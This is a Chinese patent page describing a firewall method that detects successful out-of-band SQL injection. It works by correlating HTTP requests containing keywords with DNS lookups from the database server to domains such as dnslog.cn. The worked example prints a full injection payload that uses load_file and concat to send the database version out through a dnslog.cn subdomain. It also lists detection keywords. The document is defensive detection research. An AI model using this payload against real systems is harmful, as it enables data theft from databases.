CN112261050B - 一种sql注入攻击的检测方法及装置 - Google Patents
一种sql注入攻击的检测方法及装置 Download PDFInfo
- Publication number
- CN112261050B CN112261050B CN202011145480.2A CN202011145480A CN112261050B CN 112261050 B CN112261050 B CN 112261050B CN 202011145480 A CN202011145480 A CN 202011145480A CN 112261050 B CN112261050 B CN 112261050B
- Authority
- CN
- China
- Prior art keywords
- client
- sql injection
- address
- domain name
- suspected
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1416—Event detection, e.g. attack signature detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L61/00—Network arrangements, protocols or services for addressing or naming
- H04L61/45—Network directories; Name-to-address mapping
- H04L61/4505—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
- H04L61/4511—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer And Data Communications (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
本申请提供一种SQL注入攻击的检测方法,该方法包括:在检测到客户端发往Web服务器的HTTP请求中携带有预设的关键字库中的任一关键字时,生成包括有客户端的IP地址的疑似SQL注入日志;以及在检测到预设的威胁情报库中存在与数据库服务器发出的DNS请求中携带的域名相匹配的域名时,生成可疑域名查询日志;若监测到生成的该疑似SQL注入日志的条数达到设定条数、且监测到每次生成该疑似SQL注入日志后的设定时长内均生成了可疑域名查询日志,则判定客户端成功进行了SQL注入攻击。本申请实施例可以准确地检测出客户端是否成功进行了SQL注入攻击,不会出现漏检测和误检测的现象。
Description
技术领域
本申请涉及信息安全技术领域,尤其涉及一种SQL注入攻击的检测方法及装置。
背景技术
随着互联网的逐步发展,提供各种服务的网站越来越多,给人们的日常生活提供了很大方便。然而,随着互联网发展以及计算机技术的进步,针对网站系统的攻击种类也越来越多,越来越频繁。其中,结构化查询语言(Structure Query Language,SQL)注入攻击已经逐渐成为网络系统遭遇的最频繁的攻击方式之一。
SQL注入攻击是指攻击者利用已有应用程序中的SQL注入漏洞,将恶意的SQL命令注入到后台数据库引擎中执行,达到偷取数据甚至控制数据库服务器的目的的安全事件。SQL注入漏洞常见于利用超文本传输协议(Hypertext Transfer Protocol,HTTP)实现客户端与Web服务器之间通信的Web应用程序中。
目前,现有的SQL注入攻击的检测方法,主要是通过判断客户端发往Web服务器的HTTP请求中是否携带有预设的关键字,在判断结果为是的情况下,即认定客户端进行了SQL注入攻击。
但是,在实际检测过程中,有经验的攻击者很容易绕过预设的关键字进行SQL注入攻击,出现漏检测的现象,并且,在某些合法客户端发送的HTTP请求中携带了预设的关键字的情形下,还会出现误检测的现象。
发明内容
为克服相关技术中存在的问题,本申请提供了一种SQL注入攻击的检测方法及装置。
根据本申请实施例的第一方面,提供一种SQL注入攻击的检测方法,所述方法包括:
在检测到客户端发往Web服务器的HTTP请求中携带有预设的关键字库中的任一关键字时,生成包括有客户端的IP地址的疑似SQL注入日志;以及在检测到预设的威胁情报库中存在与数据库服务器发出的域名系统(Domain Name System,DNS)请求中携带的域名相匹配的域名时,生成可疑域名查询日志;
若监测到生成的所述疑似SQL注入日志的条数达到设定条数、且监测到每次生成所述疑似SQL注入日志后的设定时长内均生成了可疑域名查询日志,则判定所述客户端成功进行了SQL注入攻击。
根据本申请实施例的第二方面,提供一种SQL注入攻击的检测装置,所述装置包括:
疑似SQL注入检测模块,用于在检测到客户端发往Web服务器的HTTP请求中携带有预设的关键字库中的任一关键字时,生成包括有客户端的IP地址的疑似SQL注入日志;
可疑域名检测模块,用于在检测到预设的威胁情报库中存在与数据库服务器发出的DNS请求中携带的域名相匹配的域名时,生成可疑域名查询日志;
攻击判定模块,用于在监测到所述疑似SQL注入检测模块生成的所述疑似SQL注入日志的条数达到设定条数、且监测到所述疑似SQL注入检测模块每次生成所述疑似SQL注入日志后的设定时长内所述可疑域名检测模块均生成了可疑域名查询日志,则判定所述客户端成功进行了SQL注入攻击。
本申请的实施例提供的技术方案可以包括以下有益效果:
在本申请实施例中,通过检测客户端发往Web服务器的HTTP请求,依据该HTTP请求中是否携带有预设的关键字库中的任一关键字,来决策是否需要生成疑似SQL注入日志;以及通过检测数据库服务器发出的DNS请求,依据预设的威胁情报库中是否存在与该DNS请求中携带的域名相匹配的域名,来决策是否生成可疑域名查询日志;之后,在均生成了疑似SQL注入日志和可疑域名查询日志的情况下,可以依据二者是否满足相关判定条件,准确地检测出客户端是否成功进行了SQL注入攻击,不会出现漏检测和误检测的现象。
应当理解的是,以上的一般描述和后文的细节描述仅是示例性和解释性的,并不能限制本申请。
附图说明
此处的附图被并入说明书中并构成本申请的一部分,示出了符合本申请的实施例,并与说明书一起用于解释本申请的原理。
图1为本申请实施例提供的一种SQL注入攻击的检测方法的流程示意图;
图2为本申请实施例提供的一种SQL注入攻击的检测装置的结构示意图;
图3为本申请实施例提供的一种电子设备的结构示意图。
具体实施方式
这里将详细地对示例性实施例进行说明,其示例表示在附图中。下面的描述涉及附图时,除非另有表示,不同附图中的相同数字表示相同或相似的要素。以下示例性实施例中所描述的实施方式并不代表与本申请相一致的所有实施方式。相反,它们仅是与如所附权利要求书中所详述的、本申请的一些方面相一致的装置和方法的例子。
在本申请使用的术语是仅仅出于描述特定实施例的目的,而非旨在限制本申请。在本申请和所附权利要求书中所使用的单数形式的“一种”、“所述”和“该”也旨在包括多数形式,除非上下文清楚地表示其他含义。还应当理解,本文中使用的术语“和/或”是指并包含一个或多个相关联的列出项目的任何或所有可能组合。
接下来对本申请实施例进行详细说明。
本申请实施例提供了一种SQL注入攻击的检测方法,该方法可以应用于网络设备,例如,该网络设备可以为入侵防御设备或者防火墙设备等,如图1所示,该方法可以包括如下步骤:
S11、在检测到客户端发往Web服务器的HTTP请求中携带有预设的关键字库中的任一关键字时,生成包括有客户端的IP地址的疑似SQL注入日志;以及在检测到预设的威胁情报库中存在与数据库服务器发出的DNS请求中携带的域名相匹配的域名时,生成可疑域名查询日志。
在本步骤中,上述预设的关键字库中可以包括load_file、concat、select、information_schema等字符串。
上述预设的威胁情报库中可以包括dnslog.cn、ceye.io等域名。
上述疑似SQL注入日志中可以记录有该HTTP请求的源IP地址、该HTTP请求的目的IP地址、该HTTP请求中携带的关键字和生成此日志的时间戳等信息。
上述可疑域名查询日志中可以记录有该DNS请求中携带的域名和生成此日志的时间戳等信息。
需要说明的是,在本申请实施例中,对于网络设备来说,之所以生成上述两种日志,主要是为了后续可以依据这两种日志之间是否满足相关判定条件,来准确地判定相关客户端是否成功进行了SQL注入攻击,进而避免漏检测和误检测的现象发生。
S12、若监测到生成的该疑似SQL注入日志的条数达到设定条数、且监测到每次生成该疑似SQL注入日志后的设定时长内均生成了可疑域名查询日志,则判定客户端成功进行了SQL注入攻击。
在本步骤中,上述设定条数和设定时长均可以根据SQL注入攻击的实际情况来设定,例如,上述设定条数为5条;上述设定时长为1秒。
需要说明的是,在本申请实施例中,对于网络设备来说,一旦生成该疑似SQL注入日志后的设定时长内生成了可疑域名查询日志,就意味着上述客户端成功进行SQL注入攻击的可能性极大,如果这种情形重复N次(N的取值与设定条数的取值相同),即可判定上述客户端成功进行SQL注入攻击。由于这种检测方式,是利用SQL注入漏洞外带查询过程中检测出来的,实际上是一种带外攻击类型的SQL注入攻击的检测方案。
进一步地,在本申请实施例中,网络设备在判定客户端成功进行了SQL注入攻击之后,还可以执行以下操作:
第一种操作:阻断源IP地址为客户端的IP地址的HTTP请求。
第二种操作:阻断数据库服务器对源IP地址为客户端的IP地址的HTTP请求进行处理后发出的DNS请求。
第三种操作:输出阻断源IP地址为客户端的IP地址的HTTP请求的阻断策略。
第四种操作:输出阻断数据库服务器对源IP地址为客户端的IP地址的HTTP请求进行处理后发出的DNS请求。
需要说明的是,在网络设备执行上述第三种操作或者第四种操作的情形下,输出的阻断策略可以供管理员决策具体由网络中的哪个设备来执行。
下面结合具体实施例对上述SQL注入攻击的检测方法进行详细说明。
以网络设备为防火墙设备为例,假设设定条数为5条,设定时长为1秒。
防火墙设备检测客户端发往Web服务器的HTTP请求以及检测数据库发出的DSN请求。
假设客户端1向Web服务器发送了HTTP请求,具体如下:
http://xxx/sqli-labs-master/Less-8/?id=1'andload_file(concat("\\\\",version(),".fhig24.dnslog.cn\\1.txt"))---。
防火墙设备检测该HTTP请求中是否携带有预设的关键字库中的任一关键字,假设预设的关键字库中包括load_file字符串,此时,检测结果为是,防火墙设备立即生成包括有客户端1的IP地址的疑似SQL注入日志。
后续Web服务器接收到该HTTP请求后,将该HTTP请求发送给数据库服务器进行查询处理。
数据库服务器对该HTTP请求进行查询处理后,得到子域名5.5.53.fhig24.dnslog.cn,向与数据库服务器进行通信的DNS服务器发出携带有此子域名的DNS请求。
防火墙设备检测预设的威胁情报库中是否存在与该DNS请求中携带的域名相匹配的域名,假设预设的威胁情报库中包括有dnslog.cn的域名,此时,检测结果为是,防火墙设备立即生成包括有5.5.53.fhig24.dnslog.cn可疑域名查询日志。
之后,假设防火墙设备监测到生成的该疑似SQL注入日志的条数达到5条、且监测到每次生成该疑似SQL注入日志后的1秒内均生成了可疑域名查询日志,则防火墙设备判定客户端1成功进行了SQL注入攻击,并输出阻断源IP地址为客户端1的IP地址的HTTP请求的阻断策略,以由管理员决策由当前网络中的哪个设备来执行此阻断策略。
当然,防火墙设备还可以采用其他阻断方式,在此不再一一详述。
由以上技术方案可以看出,在本申请实施例中,通过检测客户端发往Web服务器的HTTP请求,依据该HTTP请求中是否携带有预设的关键字库中的任一关键字,来决策是否需要生成疑似SQL注入日志;以及通过检测数据库服务器发出的DNS请求,依据预设的威胁情报库中是否存在与该DNS请求中携带的域名相匹配的域名,来决策是否生成可疑域名查询日志;之后,在均生成了疑似SQL注入日志和可疑域名查询日志的情况下,可以依据二者的关联关系,准确地检测出客户端是否成功进行了SQL注入攻击,不会出现漏检测和误检测的现象。
基于同一发明构思,本申请还提供了一种SQL注入攻击的检测装置,该装置可以应用于网络设备,例如,该网络设备可以为入侵防御设备或者防火墙设备等,其结构示意图如图2所示,具体包括:
疑似SQL注入检测模块21,用于在检测到客户端发往Web服务器的HTTP请求中携带有预设的关键字库中的任一关键字时,生成包括有客户端的IP地址的疑似SQL注入日志;
可疑域名检测模块22,用于在检测到预设的威胁情报库中存在与数据库服务器发出的DNS请求中携带的域名相匹配的域名时,生成可疑域名查询日志;
攻击判定模块23,用于在监测到所述疑似SQL注入检测模块21生成的所述疑似SQL注入日志的条数达到设定条数、且监测到所述疑似SQL注入检测模块21每次生成所述疑似SQL注入日志后的设定时长内所述可疑域名检测模块22均生成了可疑域名查询日志,则判定所述客户端成功进行了SQL注入攻击。
优选地,所述装置还包括:
第一阻断执行模块(图2中未示出),用于在所述攻击判定模块23判定所述客户端成功进行了SQL注入攻击之后,阻断源IP地址为所述客户端的IP地址的HTTP请求。
优选地,所述装置还包括:
第二阻断执行模块(图2中未示出),用于在所述攻击判定模块23判定所述客户端成功进行了SQL注入攻击之后,阻断所述数据库服务器对源IP地址为所述客户端的IP地址的HTTP请求进行处理后发出的DNS请求。
优选地,所述装置还包括:
第一输出模块(图2中未示出),用于在所述攻击判定模块23判定所述客户端成功进行了SQL注入攻击之后,输出阻断源IP地址为所述客户端的IP地址的HTTP请求的阻断策略。
优选地,所述装置还包括:
第二输出模块(图2中未示出),用于在所述攻击判定模块23判定所述客户端成功进行了SQL注入攻击之后,输出阻断所述数据库服务器对源IP地址为所述客户端的IP地址的HTTP请求进行处理后发出的DNS请求的阻断策略。
由以上技术方案可以看出,在本申请实施例中,通过检测客户端发往Web服务器的HTTP请求,依据该HTTP请求中是否携带有预设的关键字库中的任一关键字,来决策是否需要生成疑似SQL注入日志;以及通过检测数据库服务器发出的DNS请求,依据预设的威胁情报库中是否存在与该DNS请求中携带的域名相匹配的域名,来决策是否生成可疑域名查询日志;之后,在均生成了疑似SQL注入日志和可疑域名查询日志的情况下,可以依据二者的关联关系,准确地检测出客户端是否成功进行了SQL注入攻击,不会出现漏检测和误检测的现象。
本申请实施例还提供了一种电子设备,如图3所示,包括处理器31和机器可读存储介质32,所述机器可读存储介质32存储有能够被所述处理器31执行的机器可执行指令,所述处理器31被所述机器可执行指令促使:实现上述任一SQL注入攻击的检测方法的步骤。
上述的机器可读存储介质可以包括随机存取存储器(Random Access Memory,RAM),也可以包括非易失性存储器(Non-Volatile Memory,NVM),例如至少一个磁盘存储器。可选的,机器可读存储介质还可以是至少一个位于远离前述处理器的存储装置。
上述的处理器可以是通用处理器,包括中央处理器(Central Processing Unit,CPU)、网络处理器(Network Processor,NP)等;还可以是数字信号处理器(Digital SignalProcessor,DSP)、专用集成电路(Application Specific Integrated Circuit,ASIC)、现场可编程门阵列(Field-Programmable Gate Array,FPGA)或者其他可编程逻辑器件、分立门或者晶体管逻辑器件、分立硬件组件。
在本申请提供的又一实施例中,还提供了一种计算机可读存储介质,该计算机可读存储介质内存储有计算机程序,所述计算机程序被处理器执行时实现上述任一SQL注入攻击的检测方法的步骤。
以上所述仅为本申请的较佳实施例而已,并不用以限制本申请,凡在本申请的精神和原则之内,所做的任何修改、等同替换、改进等,均应包含在本申请保护的范围之内。
Claims (10)
1.一种结构化查询语言SQL注入攻击的检测方法,其特征在于,所述方法包括:
在检测到客户端发往Web服务器的超文本传输协议HTTP请求中携带有预设的关键字库中的任一关键字时,生成包括有客户端的IP地址的疑似SQL注入日志;以及在检测到预设的威胁情报库中存在与数据库服务器发出的域名系统DNS请求中携带的域名相匹配的域名时,生成可疑域名查询日志;
若监测到生成的所述疑似SQL注入日志的条数达到设定条数、且监测到每次生成所述疑似SQL注入日志后的设定时长内均生成了可疑域名查询日志,则判定所述客户端成功进行了SQL注入攻击。
2.根据权利要求1所述的方法,其特征在于,所述方法还包括:
在判定所述客户端成功进行了SQL注入攻击之后,阻断源IP地址为所述客户端的IP地址的HTTP请求。
3.根据权利要求1所述的方法,其特征在于,所述方法还包括:
在判定所述客户端成功进行了SQL注入攻击之后,阻断所述数据库服务器对源IP地址为所述客户端的IP地址的HTTP请求进行处理后发出的DNS请求。
4.根据权利要求1所述的方法,其特征在于,所述方法还包括:
在判定所述客户端成功进行了SQL注入攻击之后,输出阻断源IP地址为所述客户端的IP地址的HTTP请求的阻断策略。
5.根据权利要求1所述的方法,其特征在于,所述方法还包括:
在判定所述客户端成功进行了SQL注入攻击之后,输出阻断所述数据库服务器对源IP地址为所述客户端的IP地址的HTTP请求进行处理后发出的DNS请求。
6.一种结构化查询语言SQL注入攻击的检测装置,其特征在于,所述装置包括:
疑似SQL注入检测模块,用于在检测到客户端发往Web服务器的超文本传输协议HTTP请求中携带有预设的关键字库中的任一关键字时,生成包括有客户端的IP地址的疑似SQL注入日志;
可疑域名检测模块,用于在检测到预设的威胁情报库中存在与数据库服务器发出的域名系统DNS请求中携带的域名相匹配的域名时,生成可疑域名查询日志;
攻击判定模块,用于在监测到所述疑似SQL注入检测模块生成的所述疑似SQL注入日志的条数达到设定条数、且监测到所述疑似SQL注入检测模块每次生成所述疑似SQL注入日志后的设定时长内所述可疑域名检测模块均生成了可疑域名查询日志,则判定所述客户端成功进行了SQL注入攻击。
7.根据权利要求6所述的装置,其特征在于,所述装置还包括:
第一阻断执行模块,用于在所述攻击判定模块判定所述客户端成功进行了SQL注入攻击之后,阻断源IP地址为所述客户端的IP地址的HTTP请求。
8.根据权利要求6所述的装置,其特征在于,所述装置还包括:
第二阻断执行模块,用于在所述攻击判定模块判定所述客户端成功进行了SQL注入攻击之后,阻断所述数据库服务器对源IP地址为所述客户端的IP地址的HTTP请求进行处理后发出的DNS请求。
9.根据权利要求6所述的装置,其特征在于,所述装置还包括:
第一输出模块,用于在所述攻击判定模块判定所述客户端成功进行了SQL注入攻击之后,输出阻断源IP地址为所述客户端的IP地址的HTTP请求的阻断策略。
10.根据权利要求6所述的装置,其特征在于,所述装置还包括:
第二输出模块,用于在所述攻击判定模块判定所述客户端成功进行了SQL注入攻击之后,输出阻断所述数据库服务器对源IP地址为所述客户端的IP地址的HTTP请求进行处理后发出的DNS请求的阻断策略。
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202011145480.2A CN112261050B (zh) | 2020-10-23 | 2020-10-23 | 一种sql注入攻击的检测方法及装置 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202011145480.2A CN112261050B (zh) | 2020-10-23 | 2020-10-23 | 一种sql注入攻击的检测方法及装置 |
Publications (2)
Publication Number | Publication Date |
---|---|
CN112261050A CN112261050A (zh) | 2021-01-22 |
CN112261050B true CN112261050B (zh) | 2022-02-22 |
Family
ID=74264418
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202011145480.2A Active CN112261050B (zh) | 2020-10-23 | 2020-10-23 | 一种sql注入攻击的检测方法及装置 |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN112261050B (zh) |
Families Citing this family (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN117118752B (zh) * | 2023-10-23 | 2024-01-09 | 山东爱书人家庭教育科技有限公司 | 一种信息抗攻击的方法、系统、装置及介质 |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101594266A (zh) * | 2009-07-01 | 2009-12-02 | 杭州华三通信技术有限公司 | 一种结构化查询语言注入攻击检测方法和装置 |
CN105376217A (zh) * | 2015-10-15 | 2016-03-02 | 中国互联网络信息中心 | 一种恶意跳转及恶意嵌套类不良网站的自动判定方法 |
CN106357696A (zh) * | 2016-11-14 | 2017-01-25 | 北京神州绿盟信息安全科技股份有限公司 | 一种sql注入攻击检测方法及系统 |
CN108573152A (zh) * | 2017-03-14 | 2018-09-25 | 北京京东尚科信息技术有限公司 | 检测sql注入攻击的方法、装置、服务器和存储介质 |
CN108989355A (zh) * | 2018-09-07 | 2018-12-11 | 郑州云海信息技术有限公司 | 一种漏洞检测方法和装置 |
CN109495423A (zh) * | 2017-09-11 | 2019-03-19 | 网宿科技股份有限公司 | 一种防止网络攻击的方法及系统 |
Family Cites Families (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US11258809B2 (en) * | 2018-07-26 | 2022-02-22 | Wallarm, Inc. | Targeted attack detection system |
-
2020
- 2020-10-23 CN CN202011145480.2A patent/CN112261050B/zh active Active
Patent Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN101594266A (zh) * | 2009-07-01 | 2009-12-02 | 杭州华三通信技术有限公司 | 一种结构化查询语言注入攻击检测方法和装置 |
CN105376217A (zh) * | 2015-10-15 | 2016-03-02 | 中国互联网络信息中心 | 一种恶意跳转及恶意嵌套类不良网站的自动判定方法 |
CN106357696A (zh) * | 2016-11-14 | 2017-01-25 | 北京神州绿盟信息安全科技股份有限公司 | 一种sql注入攻击检测方法及系统 |
CN108573152A (zh) * | 2017-03-14 | 2018-09-25 | 北京京东尚科信息技术有限公司 | 检测sql注入攻击的方法、装置、服务器和存储介质 |
CN109495423A (zh) * | 2017-09-11 | 2019-03-19 | 网宿科技股份有限公司 | 一种防止网络攻击的方法及系统 |
CN108989355A (zh) * | 2018-09-07 | 2018-12-11 | 郑州云海信息技术有限公司 | 一种漏洞检测方法和装置 |
Also Published As
Publication number | Publication date |
---|---|
CN112261050A (zh) | 2021-01-22 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US9762543B2 (en) | Using DNS communications to filter domain names | |
US8024804B2 (en) | Correlation engine for detecting network attacks and detection method | |
US8578481B2 (en) | Method and system for determining a probability of entry of a counterfeit domain in a browser | |
EP1618725B1 (en) | Attack database structure | |
US20150026809A1 (en) | Systems and methods for identifying malicious hosts | |
US8205258B1 (en) | Methods and apparatus for detecting web threat infection chains | |
US7827608B2 (en) | Data leak protection system, method and apparatus | |
US8869268B1 (en) | Method and apparatus for disrupting the command and control infrastructure of hostile programs | |
US8646038B2 (en) | Automated service for blocking malware hosts | |
CN113301012B (zh) | 一种网络威胁的检测方法、装置、电子设备及存储介质 | |
US20100251371A1 (en) | Real-time malicious code inhibitor | |
US9300684B2 (en) | Methods and systems for statistical aberrant behavior detection of time-series data | |
CN107733699B (zh) | 互联网资产安全管理方法、系统、设备及可读存储介质 | |
CN106209907B (zh) | 一种检测恶意攻击的方法及装置 | |
US8566589B1 (en) | Method and apparatus for identifying a web server | |
Gupta et al. | Prevention of cross-site scripting vulnerabilities using dynamic hash generation technique on the server side | |
CN112261050B (zh) | 一种sql注入攻击的检测方法及装置 | |
CN111371917B (zh) | 一种域名检测方法及系统 | |
CN114257403A (zh) | 误报检测方法、设备及可读存储介质 | |
CN112637171A (zh) | 数据流量处理方法、装置、设备、系统和存储介质 | |
RU2778635C1 (ru) | Система и способ внешнего контроля поверхности кибератаки | |
Rahamathunnisa et al. | Preventing from phishing attack by implementing url pattern matching technique in web | |
Okamoto et al. | Implementation and evaluation of an immunity-enhancing module for ISC BIND9 | |
Razumov et al. | Development of a system for protecting against DDoS attacks at the L7 level of the OSI model-HTTP Flood | |
Zhou et al. | A distributed website anti-tamper system based on filter driver and proxy |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |